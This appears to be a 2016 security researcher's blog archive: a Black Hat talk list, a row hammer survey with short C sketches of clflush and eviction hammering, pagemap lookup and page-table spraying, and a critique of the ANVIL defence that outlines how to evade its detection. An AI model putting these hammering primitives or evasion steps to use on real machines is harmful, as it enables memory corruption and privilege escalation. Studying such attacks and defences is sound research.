Monday, August 1, 2016

BlackHat 2016: The Wish list

This blog is no longer where I post my technical work; it now holds only my private thoughts. My technical writing lives here: https://cyber.wtf

I've been honored by being chosen to speak at Black Hat for the second year in a row. Beyond speaking, I hope to meet lots of people, and I also have a wish list of talks I want to see. I considered blogging this wish list, but dropped the idea since most people wouldn't really care what I want to see. Then Enno blogged his wish list and I realized just how different his was from mine; obviously our research interests are quite different. Anyway, here it goes:

Wednesday 10:20 am: Capturing 0day exploits with perfectly placed hardware traps
I talked with Cody last year following my talk about performance counters, and he obviously has not been idle in the past year. With performance counters being used for defensive purposes, this is very likely a talk right up my alley. I shall have to miss Alex Ionescu's talk to watch this one, so I must hope Alex publishes some great slides.

Wednesday 1:50 pm: xenpwn: breaking paravirtualized device
Felix Wilhelm's master's thesis on the subject was by far the best master's thesis I've read in information security in the past 2 years. I also met Felix at Hack In The Box, and he is an all-round interesting fellow. Consequently, this is high on my list of talks to see at Black Hat.

Wednesday 3:00 pm: Intra process memory protection for applications on arm and x86 leveraging the elf abi
This talk’s title sounds like something I’d consider home turf, but I have a gut feeling that it won’t be at all. Honestly, I have no clue, but I am intrigued.

Wednesday 3:00 pm: pwning your java messaging with deserialization vulnerabilities
I know I won't see this talk, but I will recommend it to anybody interested in Java. I had the opportunity to have lunch with Matthias Kaiser at the RuhrSec conference and took great pleasure in picking his brain on this topic. For sure this talk will be worthwhile!

Wednesday 4:20 pm: Breaking kernel address space layout randomization kaslr with intel tsx
Now this smells like something I would've wanted to do myself. I get an eerie sense that there might be more flesh on this bone, and my bloodhound nose tells me I should go take a look.

Wednesday 5:30: Side channel attacks on everyday applications
I have played with, written about and talked extensively on this topic, and this is one talk that I almost certainly won't miss.

Thursday 9:00 am: Pindemonium: a dbi based generic unpacker for windows executable
In a dark past I co-authored what was probably the first public generic unpacker for Windows executables. And since I tend to enjoy a nostalgic mood, I think I'm going to check out how much the state of the art has moved since I was young.

Thursday 11:00 am: Analysis of the attack surface of windows 10 virtualization based security
Rafal Wojtczuk's talk is likely to be one of the more hardcore talks at Black Hat this year, and as a Windows 10 user I'd love to hear more about the attack surface of this platform, especially the virtualization part.

Thursday 5:00 pm: Using undocumented cpu behavior to see into kernel mode and break kaslr in the process
This talk I have to hear, though I'd much rather not. The problem is that I'm giving this talk, and I dislike hearing my own voice during talks. Should you choose to go, I actually think we have some pretty decent content.

Thursday, June 16, 2016

You've not heard the last of me

What a month May was. First I had the opportunity to meet some infosec people I haven't seen in a very long time, and I also met some people in the business I'd not met before. Then I got selected to speak at Black Hat USA 2016, the second year in a row, this time co-presenting with Daniel Gruss, one of the protagonists in the field I've been playing in for the last year and a half. Further, I had the opportunity to speak at Hack In The Box 2016 in Amsterdam on "Cache side channel attacks: CPU Design as a security problem", where again I met up with some wonderful and interesting people. As if that wasn't enough, I got to co-author my first academic paper in a field I've until now pursued only as a hobby; it will be published soon, I hope. Finally, I left the company I founded. I now work full time in infosec. It's not without a heavy heart that I leave the company I helped build. I'm proud of the work I did there and I've been fortunate to work with such brilliant people.

This transition will have consequences for my blogging. At present I cannot say how it will continue, but I think I can safely promise that you've not heard the last of me.



Anyway, thanks must go out to all the people who have helped and encouraged me, and to those who spend their time reading this blog.

Friday, May 6, 2016

Row hammer the short summary

Introduction
I recently realized how much has been published on row hammer and how much I was missing a short summary. So I wrote one, and you are now reading the result. The summary is moderately technical and is kept short with intent. I may or may not update this post, but please let me know if you think I missed something important. There will be no new results here.

Short version of how DRAM works

Current DRAM comes in modules called DIMMs. If you buy a modern memory module for your PC, you're buying a DIMM. Most DIMMs have chips on both sides; each side of the DIMM is a rank, and each rank in turn consists of a number of banks. The banks live in the individual physical chips you can see. Inside a bank you'll find a two-dimensional matrix of memory cells. There are 32k rows in the matrix and 16k or 512k cells per row. Each cell stores one bit and consists of a transistor for control and a capacitor which stores charge to signify that the bit is 1, and no charge when the bit is 0 (on some chips the encoding is reversed). Thus a row stores 8kb or 64kb of data depending on the exact kind of DRAM in front of you. When you read or write from/to DRAM, an entire row is first read into a so-called row buffer; this is because reading automatically discharges the capacitors and because writes rarely rewrite the entire row. Reading a row into the row buffer is called activating the row. An active row is thus cached in the row buffer, and if a row is already active it is not reactivated on subsequent requests. Finally, to prevent the capacitors from losing their charge over time, rows are refreshed regularly (typically every 64 ms) by activating them.


Row hammer introduction

This section is based on [1] Kim et al. where not otherwise noted.
When a row is activated, a small disturbance is caused on the neighboring rows due to so-called cross-talk effects. The effect can be caused by electromagnetic interference, by so-called conductive bridges where there is minor electric conductivity in the DRAM module where there shouldn't be, and finally so-called hot-carrier injection may play a role, where an electron reaches sufficient kinetic energy to leak from the system or even permanently damage parts of the circuitry. The net effect is a loss of charge in the DRAM cell, which if large enough will cause a bit to flip.

Consequently, it's possible to cause bits to flip in DRAM by repeatedly and systematically reading or writing from/to two rows (thereby activating them). Bit flips can be introduced in rows up to 9 rows away from these two "aggressor rows"; those rows are called victim rows. Most errors happen in the rows immediately next to an aggressor row. Picking the aggressor rows so that they bracket a victim row is called double-sided row hammering and is far more efficient than normal row hammering. Using two adjacent rows to hammer the surrounding rows is called amplified single-sided hammering and can be useful in exploitation scenarios. If the victim rows are refreshed before enough cross talk has accumulated, no bit flips are incurred. As a rule of thumb, the higher the frequency of row activation, the higher the probability of flipping bits.

It has been shown that bits can be flipped in less than 9 milliseconds, typically requiring around 128k row activations. [3] Seaborn & Dullien have reported bit flips with as few as 98k row activations.

The problem occurs primarily with RAM produced after 2010. In a sample of 129 RAM modules from 3 manufacturers, over 80% were vulnerable, with all modules produced after 2012 being vulnerable. [4] Lanteigne showed that DDR4 RAM is vulnerable too, with 8 out of 12 sampled DRAM modules subject to bit flips. Further, that paper showed that certain data patterns in the DRAM rows were more likely to cause bit flips.


Physical addressing and finding banks and rows

Obviously, to cause row hammering one needs two addresses belonging to rows in the same bank. [2] showed that repeatedly choosing two random addresses in a large buffer will, within a practical amount of time, yield a pair in the same bank and thus be useful for hammering from software.

An optimal solution requires that the attacker has knowledge of physical addresses. Even with a physical address, an attacker would need to know how addresses map to DIMMs, banks and rows in order to hammer optimally. [5] Seaborn used row hammer itself to derive the complex function that maps physical addresses to DRAM locations on a Sandy Bridge computer. [6] Pessl et al. showed how to use "row buffer side channel attacks" to derive the complex addressing function generically and provided maps for many modern Intel CPUs.

To obtain physical addresses, /proc/$PID/pagemap could provide this information. However, /proc/$PID/pagemap is not available in all operating systems and no longer affords unprivileged access in most operating systems that do support it. For an attacker, this problem remains to be definitively solved.
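For illustration, here is a minimal sketch (my own, not from any of the cited papers) of what the pagemap lookup itself looks like on Linux; on recent kernels the frame number comes back as zero without root privileges, which is exactly the restriction mentioned above:

#include <fcntl.h>
#include <stdint.h>
#include <unistd.h>

/* Translate a virtual address of the current process to a physical address
   by reading /proc/self/pagemap. Returns 0 if the lookup fails or the page
   is not present. */
uint64_t virt_to_phys(void *vaddr)
{
    uint64_t entry = 0;
    long page = sysconf(_SC_PAGESIZE);
    int fd = open("/proc/self/pagemap", O_RDONLY);
    if (fd < 0)
        return 0;
    /* one 8-byte entry per virtual page */
    off_t offset = ((uintptr_t)vaddr / page) * sizeof(entry);
    ssize_t got = pread(fd, &entry, sizeof(entry), offset);
    close(fd);
    if (got != sizeof(entry) || !(entry & (1ULL << 63)))  /* bit 63: page present */
        return 0;
    uint64_t pfn = entry & ((1ULL << 55) - 1);            /* bits 0-54: page frame number */
    return pfn * page + ((uintptr_t)vaddr & (page - 1));
}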


Row hammering with software

To cause row hammer from software you need to activate memory rows, that is, cause reads or writes to physical memory. However, modern processors are equipped with caches so that they don't incur serious speed penalties when memory is read or written. Thus, to cause row hammering bit flips, the caches must be bypassed.

[1] did this using the clflush instruction, which removes a particular address from the cache, causing the next read of that address to go directly to memory. This approach has two downsides. First, since clflush is a rare instruction, validator sandboxes (such as NaCl in Google Chrome) can ban the instruction and thus defeat the attack. Second, just-in-time compilers and existing code on computers generally do not use this opcode, ruling out attack scenarios where JIT compilers are used (such as JavaScript) and, looking ahead, attacks that reuse existing code in data-only attacks.
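As a minimal sketch (not the code from [1] or [2]), the clflush variant boils down to a loop like this, assuming addr1 and addr2 have already been chosen to lie in different rows of the same bank:

#include <emmintrin.h>   /* _mm_clflush */

/* Classic clflush-based hammering loop. The hard part, picking addr1 and
   addr2 so they map to two different rows of the same DRAM bank, is what
   the section on physical addressing above is about. */
static void hammer(volatile char *addr1, volatile char *addr2, long rounds)
{
    for (long i = 0; i < rounds; i++) {
        (void)*addr1;                      /* activate the row of addr1 */
        (void)*addr2;                      /* activate the row of addr2 */
        _mm_clflush((const void *)addr1);  /* force the next read back to DRAM */
        _mm_clflush((const void *)addr2);
    }
}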

[7] Aweke posted on a forum that he was able to flip bits without clflush. He did not say how, but it was likely using the same method as [8], which systematically accesses memory in a pattern that causes the processor to evict the attacker's row address from the cache, so that the next read goes to physical memory. Unfortunately, how to evict caches is CPU dependent and undocumented, and despite [8] Gruss, Maurice & Mangard mapping out how to evict optimally on most modern CPUs, it is not a trivial process. Typically it requires knowledge of the physical address, as discussed above, as well as of a complex mapping function for cache sets; it is, however, possible to approximate this either through large pages or through timing side channels. It is also slower and thus less efficient than the clflush version above. Since this vector does not require special instructions, it's applicable to native code (including sandboxed code), JavaScript and potentially other JIT compiled languages.
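A hedged sketch of the eviction variant: instead of clflush, the aggressor is pushed out of the cache by touching an "eviction set" of addresses that map to the same L3 cache set. Building that set and choosing the access order is the CPU-dependent part; the naive order below only shows the principle, not an optimized pattern from [8].

/* Hammer one aggressor row without clflush: after each access, walk an
   eviction set whose members map to the same L3 cache set as the aggressor,
   so the aggressor line is evicted and the next access misses to DRAM again. */
static void hammer_evict(volatile char *aggressor,
                         volatile char **ev_set, int ev_len, long rounds)
{
    for (long i = 0; i < rounds; i++) {
        (void)*aggressor;              /* row activation on a cache miss */
        for (int j = 0; j < ev_len; j++)
            (void)*ev_set[j];          /* evict the aggressor from the cache */
    }
}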

[9] Qiao & Seaborn found that the movnti instruction is capable of bypassing the caches on its own. Further, this instruction is commonly used, including in memcpy/memset implementations in common libraries, and is thus difficult to ban in validator sandboxes; it also lowers the burden for future row hammer as a code reuse attack. It remains to be seen whether JIT compiled languages can make use of it.

Finally, [10] Fogh showed that the policies that maintain the coherency of the multiple caches on a CPU can be used to cause row activations, and speculated that it would be fast enough for row hammering. Since the coherency policies are subject to much less change than cache eviction policies and do not require any special instructions, this method may solve the problems of the other methods, should it be fast enough. This remains to be researched.


Exploiting row hammer

[2] showed that row hammer could be used to break out of the NaCl Chrome sandbox. The NaCl sandbox protects itself by verifying all code paths before execution and blocking undesired activities. To prevent new, unintended code paths from being executed, the sandbox forces jump targets to be 32-byte aligned by masking the register and adding a base address. In code it looks like this:
and rax, ~31
add rax, r15  //(base address of sandbox)
jmp rax
Bit flips in these instructions often cause other registers to be used and thus bypass the sandbox's enforcement of safe jump targets. By spraying code like the above, then row hammering, checking for usable bit flips, and finally using one of the corrupted jumps, a non-validated code path can be executed and the sandbox escaped. Non-validated code paths can be entered through code-reuse style gadgets.

The second and more serious privilege escalation attack demonstrated by [2] went from ring 3 user privileges to ring 0. Since adjacent physical addresses tend to be used at the same time, CPU vendors map adjacent physical addresses to different parts of RAM, as this offers the possibility of memory requests being handled by DRAM in parallel. The effect is that banks are often shared between different software across trust boundaries. This allows an attacker to flip bits in page table entries (PTEs). PTEs are central to security on x86 and control access rights to memory as well as the mapping between virtual and physical addresses. By repeatedly memory-mapping a file, many new PTEs are generated. The attacker then uses row hammer to cause bit flips in these PTEs, hoping that a bit flips so that a PTE with write privileges points to a new physical address where another PTE is located. By strategically modifying this second PTE, the attacker gains read and write access to the entire memory.
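As a rough, hedged sketch of the spraying step only (the file name and mapping count are placeholders, and the full exploit in [2] obviously does much more than this):

#include <fcntl.h>
#include <stddef.h>
#include <sys/mman.h>

/* Map the same file over and over so the kernel has to create a large number
   of page-table entries pointing at attacker-known mappings. A later bit flip
   then has a decent chance of landing in one of these PTEs. */
#define NUM_MAPPINGS (1 << 14)                 /* placeholder count */
static void *mappings[NUM_MAPPINGS];

static void spray_ptes(const char *path, size_t len)
{
    int fd = open(path, O_RDWR);
    for (int i = 0; i < NUM_MAPPINGS; i++)
        mappings[i] = mmap(NULL, len, PROT_READ | PROT_WRITE,
                           MAP_SHARED, fd, 0);
}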

It is likely that row hammer can be exploited in other ways.


Row hammer mitigation

Most suggested hardware mitigations focus on refreshing victim rows more often, thus leaving less time for row hammer to do its work. Unfortunately, during a refresh the RAM is unable to respond to requests from the CPU, so this comes at a performance penalty.
The simplest suggestion is to increase the refresh rate for all RAM. Much hardware supports this already for high temperatures. Usually the refresh rate is doubled; however, to rule out row hammer perfectly one would need to increase it more than 7-fold [1], which in turn is a steep performance penalty and a power consumption issue.

TRR [17] is a method that keeps track of used rows and causes targeted refreshes of their neighbors to minimize the penalty. The method needs to be supported by both the CPU and the RAM modules. MAC, also known as maximum activation count, keeps track of how many times a given row was activated. pTRR does this only statistically and is thus cheaper to build into hardware. PARA [1] is another suggested hardware mitigation that statistically refreshes victim rows. ARMOR [16] is a solution that keeps track of row activations in the memory interface.

It has been suggested that ECC RAM can be used as a mitigation. Unfortunately, ECC RAM will not detect or correct bit flips in all instances where there are multiple bit flips in a row, which leaves room for an attack to succeed even with ECC RAM. ECC RAM may also cause the attacked system to reset, turning row hammer into a denial-of-service attack. [4] suggests this problem persists in real-life experiments.

Nishat Herath and I suggested using the LLC miss performance counter to detect row hammering in [11] Fogh & Herath. LLC misses are rare in normal usage but abundant in row hammering scenarios. [12] Gruss et al. and [13] Payer refined the method by correcting for general activity in the memory subsystem. These methods are likely to present false positives in some cases, and [11] and [13] therefore suggested only slowing down offenders to prevent bit flips. [14] Aweke et al. presented a method that first detects row hammering as above and then verifies it using PEBS performance monitoring, which has the advantage of delivering an address related to a cache miss and thus grants the ability to selectively read neighboring rows, effectively a targeted row refresh in software. [15] Fogh speculated that this method could be effectively bypassed by an attacker.
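To give an idea of what the first detection stage looks like in practice, here is a hedged sketch using Linux's perf_event_open to count LLC misses over a short window. The 6 ms window matches the stage-1 interval Aweke et al. use; the threshold is a placeholder that would have to be calibrated, and the exact events and plumbing in [11]-[14] differ in detail.

#include <linux/perf_event.h>
#include <stdint.h>
#include <string.h>
#include <sys/syscall.h>
#include <unistd.h>

/* Open a system-wide last-level-cache miss counter on CPU 0
   (requires sufficient privileges). */
static int open_llc_miss_counter(void)
{
    struct perf_event_attr attr;
    memset(&attr, 0, sizeof(attr));
    attr.size = sizeof(attr);
    attr.type = PERF_TYPE_HARDWARE;
    attr.config = PERF_COUNT_HW_CACHE_MISSES;
    return (int)syscall(__NR_perf_event_open, &attr, -1 /* all pids */,
                        0 /* cpu 0 */, -1 /* no group */, 0);
}

/* Stage-1 style check: count LLC misses in a 6 ms window and compare them
   against a calibrated threshold. */
static int window_is_suspicious(int fd, uint64_t threshold)
{
    uint64_t before = 0, after = 0;
    read(fd, &before, sizeof(before));
    usleep(6000);                              /* 6 ms observation window */
    read(fd, &after, sizeof(after));
    return (after - before) > threshold;
}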

Literature
[1] Yoongu Kim, R. Daly, J. Kim, C. Fallin, Ji Hye Lee, Donghyuk Lee, C. Wilkerson, K. Lai, and O. Mutlu. Flipping Bits in Memory Without Accessing Them: An Experimental Study of DRAM Disturbance Errors. In Computer Architecture (ISCA), 2014 ACM/IEEE 41st International Symposium on, pages 361--372, June 2014.
[2] Mark Seaborn and Thomas Dullien. Exploiting the DRAM rowhammer bug to gain kernel privileges. March 2015.
[3] Mark Seaborn and Thomas Dullien. “Exploiting the DRAM rowhammer bug to gain kernel privileges”. https://www.blackhat.com/docs/us-15/materials/us-15-Seaborn-Exploiting-The-DRAM-Rowhammer-Bug-To-Gain-Kernel-Privileges.pdf
[4] Mark Lanteigne. "How Rowhammer Could Be Used to Exploit Weaknesses in Computer Hardware". Third I/O. http://www.thirdio.com/rowhammer.pdf
[5] Mark Seaborn. "How physical addresses map to rows and banks in DRAM".
[6] Peter Pessl, Daniel Gruss, Clémentine Maurice, Michael Schwarz, Stefan Mangard: "Reverse Engineering Intel DRAM Addressing and Exploitation"
[7] Zelalem Birhanu Aweke, “Rowhammer without CLFLUSH,” https://groups.google.com/forum/#!topic/rowhammer-discuss/ojgTgLr4q M, May 2015, retrieved on July 16, 2015.
[8] Daniel Gruss, Clémentine Maurice, Stefan Mangard: “Rowhammer.js: A Remote Software-Induced Fault Attack in JavaScript”
[9] Rui Qiao, Mark Seaborn: “A New Approach for Rowhammer Attacks”. http://seclab.cs.sunysb.edu/seclab/pubs/host16.pdf
[10] Anders Fogh: “Row hammer, java script and MESI” http://dreamsofastone.blogspot.de/2016/02/row-hammer-java-script-and-mesi.html
[11] Anders Fogh, Nishat Herath. “These Are Not Your Grand Daddys CPU Performance Counters”. Black Hat 2015. http://dreamsofastone.blogspot.de/2015/08/speaking-at-black-hat.html
[12] Daniel Gruss, Clémentine Maurice, Klaus Wagner, Stefan Mangard: “Flush+Flush: A Fast and Stealthy Cache Attack”
[13] Mathias Payer: “HexPADS: a platform to detect “stealth” attacks“. https://nebelwelt.net/publications/files/16ESSoS.pdf
[14] Zelalem Birhanu Aweke, Salessawi Ferede Yitbarek, Rui Qiao, Reetuparna Das, Matthew Hicks, Yossi Oren, Todd Austin:”ANVIL: Software-Based Protection Against Next-Generation Rowhammer Attacks”
[15] Anders Fogh: “Anvil & Next generation row hammer attacks”. http://dreamsofastone.blogspot.de/2016/03/anvil-next-generation-row-hammer-attacks.html
[16] http://apt.cs.manchester.ac.uk/projects/ARMOR/RowHammer/armor.html


Wednesday, March 9, 2016

Anvil & next generation row hammer attacks

My ramblings

No technical stuff here. If you are here for the tech, skip to the introduction.

First up: the KASLR blog post part 2 is in progress. It might take a while, because there is a bit more meat on that bone than I'd expected and I want to do it right. But for now I hope you'll enjoy this more speculative row hammer related post.

My all-time favorite paper is [1] "Factors affecting voluntary alcohol consumption in the albino rat" by Kalervo Eriksson. I haven't read it, but everything about the title fascinates me. Why albino rats? What factors? Why does it intrigue me? Alcoholic rats? Binge drinking or occasional relaxation? Beer or whiskey? What is an albino rat hangover like? And most of all, what was the motivation of the author? I shall not know anytime soon, because I enjoy pondering these questions too much.

The second on my list is one I've actually read: [2] "Lessons from the Bell Curve" by James Heckman. I know James Heckman's work pretty well because I spent a few years studying micro-econometrics; he is an amazing econometrician and was awarded the Nobel prize for his work in this area. But this paper stood out to me. It's not on economics (at least not directly), and it was not a particularly original paper, since it took its starting point in a controversial book. The book, "The Bell Curve", was about the influence and distribution of intelligence. The criticism this book received (and it was a lot) was mostly politically correct dissent that did not engage with the evidence-based research presented in the book. Heckman took the same data and systematically took it apart with state-of-the-art econometric methods, dismissing some conclusions and confirming others, with no regard to the political correctness of his results. To my mind it is too rare that this kind of paper gets published, yet it is very much at the core of science to check the robustness of other people's results and to apply new methods to old data. That paper is my inspiration when I critique other people's work on this blog.

Introduction

The subject of this blog post is a paper by [3] Aweke et al. called "ANVIL: Software-Based Protection Against Next-Generation Rowhammer Attacks" (it can be found here: http://iss.oy.ne.ro/). In it they first develop a cache-eviction-based row hammer attack to supplement the classic clflush one, much along the lines of the rowhammer.js attack. Then they develop a mitigation method for the row hammer attack, and I'll spend some time looking into their work below. They test this method against the classic row hammer attack using clflush and against the cache-eviction-based attack. In this blog post I'll first shortly summarize the paper, then comment on it, and finally look into how the mitigation may be bypassed by next-generation row hammer attacks. I shall not develop these next-generation attacks in full, so it is somewhat speculative whether they would actually work, but I hope to point fingers in directions where row hammer could go in response to mitigations such as the one in this paper. There are a number of reasons for this. First, I don't actually have access to their mitigation and thus cannot test against it. Second, I would have to borrow a computer to flip bits, as neither mine nor my wife's seems to produce bit flips when row hammering. Third, I am somewhat reluctant to fully develop new attacks for which there currently is no protection. Finally and most importantly, I'm a blogger doing this stuff after hours between all my other hobbies and obligations; it's simply not within my time budget.

Despite any critique herein, I should make it very clear beforehand that I really like the paper and think it is an important contribution. If it wasn't, I wouldn't spend time on it. The method certainly passes the litmus test of raising attacker cost, and we must always remember that perfection is the enemy of good. Unfortunately, this blog post turned out a bit more technical than I would've liked. To really engage with it you need some knowledge of row hammer, performance counters and the cache subsystem. Regular readers of my blog should be OK.


Ultra short summary of the Anvil paper

The paper's results are:
1.    Bit flips can be caused in 15 ms.
2.    Because of 1, the suggested mitigation of increasing the DRAM refresh rate from one refresh every 64 ms to one every 32 ms is not sufficient protection.
3.    Row hammer can be done without clflush. [5] Seaborn & Dullien suggested limiting access to clflush to kernel mode, and Google removed support for the clflush instruction in the NaCl sandbox. The authors show that this is not a viable solution, because one can use cache eviction to bypass the cache and access physical memory fast enough to cause row hammering.
4.    They then go on to develop a software mitigation, Anvil, which works in 3 stages:
a.    Stage 1: Using the fact that high rates of last-level cache misses are rare on modern computers, they use the LLC miss performance counter as a first check for whether an attacker is row hammering. If LLC misses exceed a threshold per time unit, Anvil continues to the second phase; if not, it just keeps monitoring. In addition to LLC misses it also monitors MEM_LOAD_UOPS_RETIRED_LLC_MISS; this value gets used in the second stage.
b.    Stage 2: In the second stage Anvil uses PEBS performance events to sample loads and/or stores. These events can sample loads/stores above a given latency, and the authors set this latency to match that of a cache miss. The advantage of these events is that they provide the load/store address, which allows the authors to identify whether the same rows are being used again and again or whether the access pattern is spread across memory and thus benign. If it's not benign, they proceed to stage 3. To cut down on the overhead of sampling stores with PEBS, they only sample stores if the MEM_LOAD_UOPS_RETIRED_LLC_MISS count from the first stage was significantly smaller than the LLC misses; the thought here is that if they saw only loads in the first stage, a potential attack is not driven by stores.
c.    Stage 3: Anvil has at this point detected a row hammer attack and will now thwart it. Because reading a row automatically refreshes it, Anvil uses the addresses found in the second stage to figure out which rows are being hammered and then issues reads to the neighboring rows.
5.    The analysis of Anvil finds that it comes at a low performance cost: the first stage is cheap performance-wise, and it's rare that Anvil proceeds to stage 2.



The short commentary

Regular readers of this blog will not be surprised by most of what is found in the Anvil paper.

1.    The 15 ms the authors take to cause a bit flip seems a bit high. [4] Kim et al. state that a refresh interval below 8.2 ms is required to entirely kill row hammering, which again suggests that bit flips can be caused significantly faster under "favorable" circumstances.
2.    It follows logically from 1 that lowering the refresh interval to 32 ms does not completely deal with row hammer. Nishat Herath of Qualys and I pointed this out at Black Hat; our slides and further comments can be found in my "Speaking at Black Hat" post.
3.    That bit flips can be caused without clflush is also not a surprise. It confirms [6] Gruss, Maurice & Mangard, who went a step further, generated optimal cache eviction strategies and implemented a JavaScript-based attack.
4.     Anvil:
a.    Stage 1: This is exactly the same approach that I took in my first two blog posts on row hammer detection and mitigation, which formed the basis for Nishat's and my talk at Black Hat. All come to the result that there is a high correlation between this performance counter and row hammering. [7] Gruss, Maurice & Wagner took it one step further, adjusted for overall memory activity, and they too got pretty good results. I noticed false positives in my work with this method, and this result is reproduced by the Anvil authors.
b.    Stage 2: Here we have the first big new contribution of the paper, and it's a great one. It certainly opens up new ways to think about cache attack detection and mitigation. It is a natural way to connect cache misses to actual row hammering because you get addresses. I shall examine this method in more detail below.
c.    Stage 3: The method of mitigating by reading neighboring rows was suggested by Nishat and myself at our Black Hat talk. We only confirmed that reading victim rows would protect against row hammer; we didn't actually use it in our mitigation work and instead suggested causing a slowdown when too many cache misses occurred, because we saw no good way of actually inspecting which addresses were being used. I must honestly say that I missed PEBS while designing that mitigation and found no good way of connecting a cache miss to an address. I shall analyze below to what extent Anvil succeeds at this. We suggested the slowdown as a "soft response" in light of the rare false positives in a.

5.    The analysis of the performance penalty of Anvil rather closely follows the results I had testing our mitigation system from Black Hat. I used an entirely different set of test applications and came to the same conclusions. Thus I can confirm that Anvil is likely to have a very low performance impact that should be acceptable for most systems: the first stage is nearly free, and benign applications that get misdetected in the first stage are rare. I should note here that Aweke et al. use h264ref to test Anvil and find that this video encoder rarely triggers the first stage. However, h264ref is not representative of video encoders, for multiple reasons. In my own testing, an h264 video encoder (that I've co-authored) generated too many cache misses a great many times. h264ref is written to be portable and easily understood; production video encoders are much more streamlined in their memory access, and in particular the heavy use of streaming instructions makes actual memory speed the limiting factor in many operations, especially motion search. Modern video encoders also use threading much more, which puts the L3 cache under much more pressure than h264ref does. Also, to evaluate a video encoder's impact on memory access it's important to use the right input material, because video encoders tend to skip additional calculations when they find something estimated to be "good enough". Nevertheless this is probably mostly a personal comment; the authors' conclusions generally match my results.



Anvil and future row hammer attacks


Aweke et al. conclude: "We feel that these results show it is viable to protect current and future systems against row hammer attacks". As always it's hard to tell what the future holds, but my understanding of next-generation attacks is that they adapt to mitigation methods. In this section I shall outline what I think are weaknesses in Anvil that attacks could exploit in the future. Unfortunately, I end up being a lot more pessimistic. Even if the authors are right, I'd still prefer a hardware solution such as pTRR or PARA. The reason is that I'm a strong believer in fixing problems at their root cause: the cause of row hammer is a micro-architectural problem and it should be fixed in micro-architecture. We should also consider that DRAM is used in other devices than modern x86 computers. That said, until we see such a solution, software might be the only option, and Anvil or other solutions certainly are candidates to fill the void.

My first source of pessimism is my work on the cache-coherency way of activating rows. I haven't actually tested it, but I think it may bypass the LLC miss counter, since the entry being hammered never actually leaves the cache; see my blog post on MESI and row hammer for more details. Now, I don't know if that method is fast enough for row hammering, but if it is, it may affect all software solutions suggested thus far, because all three hinge on the LLC_MISS counter. Should this attack actually be fast enough, and should it indeed avoid LLC cache misses, it is probably not a fatal problem: there are performance counters that cover this kind of activity, it is a rare event in benign software, and thus we should be able to work around it. Such counters could be implemented as a parallel option in stage 1 of Anvil.

Aweke et al. suggest using a 6 ms sampling interval for stage 1 and a 6 ms sampling interval for stage 2. This means they spend 12 ms detecting an attack before they respond. With [4] suggesting that a refresh interval of 8.2 ms is required to rule out row hammer attacks, this might actually give an attacker enough time to flip a bit. Aweke et al. suggest that 110k activations are required to cause bit flips; if we multiply this by the 55 ns activation interval reported by [4], we end up with a lower bound on row hammering of only ~6 ms. However, the authors also evaluate a version of Anvil with 2 ms intervals, which they call Anvil-Heavy, and conclude that this version would work as well, despite slightly more overhead. It would seem that Anvil-Heavy is the more relevant version of Anvil if the row hammer mitigation is supposed to be "perfect". It is conceivable that the cross-talk effects behind row hammer will become more serious with time as memory gets denser and faster. How much wiggle room Anvil has to compensate beyond Anvil-Heavy is in my opinion an open question, the two factors being how much overhead lowering the intervals below 2 ms will cause through false predictions in stage 1 and more sampling in stage 2, and also that the sampling interval in stage 2 can only be shortened so much before too few samples are collected to determine the row locality of the hits. All this said, I think the article underestimates the performance cost of a truly secure implementation, but it might still be acceptable.

It should be noted that there is a good chance an attacker can gain a bit of introspection into Anvil. My guess is that if the attacker monitors latency in (say) a classic clflush row hammer attack, he'll be able to see when Anvil switches to the second stage. The reasoning is that sampling with PEBS adds latency to the instructions being sampled; just interrupting the process would typically be on the order of 4000 CLKs, including only rudimentary handling, and that is much less than what Anvil actually has to do. There is a reason Aweke et al. see performance penalties in the second stage. It is important to note that with latencies of this order of magnitude, anomalies can be detected by the attacker at very little cost, thus hardly disturbing the attack itself.

An example of how this could be used to bypass Anvil hinges on an implementation detail: Anvil does not sample store operations in the 2nd stage if store operations were rare in the first stage. This leaves room for an attacker to switch from a load-based attack to a store-based attack mid-attack and thus outwit stage 2. This isn't a fatal flaw by any means and can be worked around by simply always sampling stores; the overhead should be acceptable given that it's rare in real life that the 2nd stage even engages. But again, the paper is probably underestimating the performance cost required for "perfect protection". However, I don't think this example is the real issue; the issue is that an attacker can adapt to the defense.

The last issue with Anvil that I'll cover in this blog post is that Anvil assumes that a high-latency instruction has high latency because of the loads and stores it does. While this holds true for traditional attacks, it is not a given. The cache subsystem and the hardware prefetchers are examples of off-core subsystems from which accesses to DRAM can originate without being part of loads and stores initiated by an instruction in the core. Here is an example of how PEBS can be tricked. I'll keep it simple by only accessing memory from one row, but it should be clear how a second row could be added to do row hammering.
1.    Let A be a cache set aligned address in an aggressor row
2.    Let E be an eviction set for A, consisting of E1..EN, where N is the number of ways and E1..EN are not in the same DRAM bank as A
3.    Prime A's cache set with E.
4.    Use clflush to remove one way of E, thus creating a way in the set marked as Invalid
5.    Use a store operation (mov [A],1) to set the invalid cache way to Modified, containing A.
6.    Now evict A using E, causing a write-back of A.
7.    Repeat from 4.


As for 2, this is easily done; there are plenty of addresses belonging to E besides A to pick from. 3 is standard stuff. In 4 we may get high latency, but even if clflush is a store operation (which it may or may not be), it will not use A, and thus an irrelevant address will be recorded by PEBS; also, the latency of a clflush is around 115 CLKs (on my wife's Sandy Bridge), significantly below that of a cache miss, and further it might not actually be needed. In 5, a 4-byte store operation does not load the rest of the cache line from DRAM (at least on my wife's Sandy Bridge), so the latency is low and will not be recorded by Anvil's PEBS. In 6 we do get latency, since we cause a write-back of A, but PEBS will record E, which is irrelevant. Such a scheme may be too slow for actual row hammering, but I don't think it is: after all, the normal eviction-based attack is 70% faster than the requirement of 110k activations in a 64 ms refresh interval according to [3]. Even if this turns out to be too slow for row hammering, it demonstrates that the second stage of Anvil may have severe deficiencies.
Finally, we can use the classic clflush method during the 1st phase of Anvil, as noted above.

I can come up with other scenarios in which this (and in some cases the other) software row hammer mitigations may fail, but I think I've put enough on the table for this blog post.



Conclusion


The current implementation of Anvil is a low-overhead row hammer mitigation which will work well against attacks that are not engineered to bypass it. Should Anvil become widespread, it is likely that next-generation methods of row hammering exist that are capable of bypassing its second stage. Thus, if I were to choose a method for row hammer mitigation on a mission-critical system, I would go with the suggestion made by [7]: triggering a simple slowdown in the event of a detection. It has the benefit of thwarting some cache side channel attacks in the process. While this has a much higher performance penalty on a few applications, it'll run at the same performance cost as Anvil in most real-world scenarios, and its simplicity offers less attack surface for engineered attacks.


Literature

[1] Kalervo Eriksson,”Factors affecting voluntary alcohol consumption in the albino rat”; Annales Zoologici Fennici; Vol. 6, No. 3 (1969), pp. 227-265
